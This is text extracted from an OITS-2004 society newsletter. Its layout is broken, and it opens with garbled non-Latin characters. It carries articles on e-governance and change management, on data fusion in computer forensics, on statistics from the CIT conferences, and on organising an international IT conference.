`ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 15: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

11

Celebrate- what accomplishments are worthy of theimportant organizational ritual of celebrating successLearn-Why is what working or not workingImprove- what exactly should who do differentlyto improve performance

Prof Robert D Behn defined theabovementioned measures in his paper onPublic Administrative Review Journal editionSeptemberOctober 2003 Vol 63 No5 Prof Behnis a Lecturer at Harvard Universitys JF KennedySchool of Government and also a faculty chairof its executive programme Driving GovernmentPerformance

We are convinced about Prof Behns ideaand his paper that we should measureperformance and make every person accountablefor delivery of work in a given timeframe in theDigital Age and for better or good governanceProf Behn mentions that performance measurescould be used for multiple purposes Moreoverdifferent people have different purposes

But we think the ultimate goal ofperformance measurement must relate to thework environment and the work culture in everysegment a government agency NGOstakeholders citizens or corporates All of themmust be accountable for their role and work andthis can be only happen if we make aperformance measurement index in everysegment and link it with Change Management

This issue of Change Management quiterapid at times is a fundamental challenge to beaddressed by the practise of e-Governance Thiswould involve

Delivery of public services like utilitiesrural and urban development schemesthrough EDI Internet and other IT-basedtechnologies that would necessitateprocedural and legal changes in the

decision and delivery-making processes aswell as institutions

Fundamental changes in governmentsdecision management

Changes in decision-making procedures interms of decision-making levels anddelegation of authority

Mandatory changes in legal provisions togive effect to the technology objectives

Accordingly the issues to be addressedrelate to

Mandatory organisational andinstitutional changes affecting both peopleand methods at all interfaces of the DeliveryChain

The need for acceptance of ChangedProcesses to be properly understoodinternalised adopted and improved toenable full advantages of the technologybeing adopted

De-layering of the decision-making levelsleading to re-engineering and appropriatesizing of the decision-making machinery

Training and acclimatisation of personnelat all levels more so at the lower rung ofgovernment management organisations

Prime MinisterChief MinisterLocalRepresentative Political Will PowerLoss of vested interests and assumed

power as well as authority both amongst thelegislature and the executive

We tried to conceptualise this with adiagram In the democratic world citizens electa person who is later termed the peoplesrepresentative or an MLA or MP All previousresearch did not include the peoplesrepresentative because in a democratic set-up

OITS-2004

12

the peoples representatives rule the countrythrough the Legislative Assembly or Lok Sabha(Parliament) and through the making of peopleor business-friendly laws and citizen-relatedschemes For the first time we tried to link thesepeople because political motivation is imperativefor the e-governance drive in India or anywhereelse in the world All people are directlyconnected with their representative as well as

administration for day-to-day governmentservices or work In this diagram both thepolitical level and administrative level are linkedwith citizens

In the abovementioned concept keeping inmind the reality of a democratic country andPerformance Management and Change Managementwe tried to bring in a new definition for e-Government

Performance Measurement of Government workforce

Change Management

Prime MinisterChief MinisterLocal Representative

Political Will Power

Efficiency in Government

Citizens Confidence in Government for

Better

Better Citizens Services through ICT-e-Government

e-Governance

Administrator

People willChange The Representativeif they do not perform

Citizens Confidence inGovernment for Better

Governance

OITS-2004

13

that is Use of ICT by the Government to providebetter Citizens Centric Services and Applicationthrough performance measurement based onchange management in internal organisationaltransformation set-up that is called e-Government

In other words e-Governance should belinked with the empowerment of everystakeholder along with the economicdevelopment of the country

There are other major issues too Ananalysis of the determinants of successful e-Government programmes shows that the keyfactors are the countries political will thestrength of their human capital theirtelecommunications infrastructure and thepresence of administrative priorities

The United Nations Report develops andpresents a synthetic e-Government index thatreflects and incorporates the countries officialonline presence evaluates theirtelecommunications infrastructure and assessestheir human development capacity In essencethe index reflects the requisite conditions that

constitute an enabling environment for e-Government

Multidimensional approach should beapplied for this kind of initiative that leads toreforms issues e-Government is considered aglobal change programme towards a custom-oriented governmental organisation Atransition of this importance needs clear visionand leadership A recent study on benchmarkingon e-Government projects done by CGEampY hasshown that different kind of e-Governmentprojects in the EU have been translated intomodels with important enablers for the furtherdevelopment of e-Government

These enablers are clustered into thefollowing categories

middot Leadershipmiddot Organisationmiddot Culturemiddot TechnologyA successful e-Government strategy should

contain all elements of the model in a balancedway

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

OITS-2004

14

Enablers for Further e-GovernmentDevelopment

What kind of citizens services are neededmust first be analysed by the government so thataccording to requirements the governmentprovides services at minimum cost with nohassle through proper use of ICT This is thefirst step of e-Governance Government shouldstart performance-based change management inthe internal system for better efficiency andreliability to provide much-needed e-Government services in a manner that isaccountable Goals should be defined first andpriorities should be taken in account

Basic citizens services are considered firstbefore any e-Governance initiative and these canbe centralised with the department and availableonline for citizens and business peopleCitizens BusinessesIncome Taxes Social Contribution

for EmployeesJob Search Corporate TaxSocial Security Benefits VATPersonal Documents Registration of a New

CompanyCar Registration Submission of Data to the

Statistical OfficeApplication for Building Custom DeclarationPermission Declaration to Police Environment-related

PermitsPublic Libraries Public ProcurementBirth and MarriageCertificates Enrolment in HigherEducationAnnouncement of Moving Health-related Services

Sources CAP GEMINI Ernst amp Youngs Onlineavailability of public services Oct 2001Oct 2002

The recent study report by PACIFICCOUNCIL ON INTERNATIONAL POLICYRoadmap for E-Government in the DevelopingWorld has shown that the spread of informationand communication technology brings hope that

the government can transform And indeedforward-looking officials everywhere are usingtechnology to improve their governments workefficiency To recapitulate defined broadly e-Government is the use of ICT to promote moreefficient and effective government facilitate moreaccessible government services allow greaterpublic access to information and makegovernment more accountable to citizens E-Government might involve delivering servicesvia the Internet telephone community centres(self-service or facilitated by others) wirelessdevices or other communications systems

But e-Government is not a shortcut toeconomic development budget savings or cleanefficient government

E-Government is not the Big Bang asingle event that immediately and forever altersthe universe of government

E-Government is a process call it e-volution and often a struggle that presentscosts and risks both financial and political

These risks can be significant If not wellconceived and implemented e-Governmentinitiatives can waste resources fail in theirpromise to deliver useful services and thusincrease public frustration with governmentParticularly in the developing world whereresources are scarce e-Government must targetareas with high chances for success and producewinners

Moreover e-Government in the developingworld must accommodate certain uniqueconditions needs and obstacles These mayinclude a continuing oral tradition lack ofinfrastructure corruption weak educationalsystems and unequal access to technology Toooften the lack of resources and technology iscompounded by a lack of access to expertise andinformation

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

Therefore the government should rethinkand link these management tools in e-governanceenvironment to change the old mindset ofemployees (officials) because technology cantdo everything alone People need transformationin the government as well as the thinking of theperformer who performs the role in the e-Governance initiative Indeed e-Governmentmeans transformation of the government processthrough a series of measurements by applyingnew kinds of methodology and sharing the bestpractices along with knowledge and ideas inthe ICT environment That is the only way torealise our dreams

Raj Kumar Prasad is the Editor of Indian firste-commerce and CEO The Indian Chapter of theCommonwealth Centre for e-Governance and regularspeaker on e-governance and e-commerce worldwide anda thinker for social reform through ICT He is also memberof many world organisations and editorial member of manyInternational journals author can be reached atrajkumarelectronicgovindianet

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

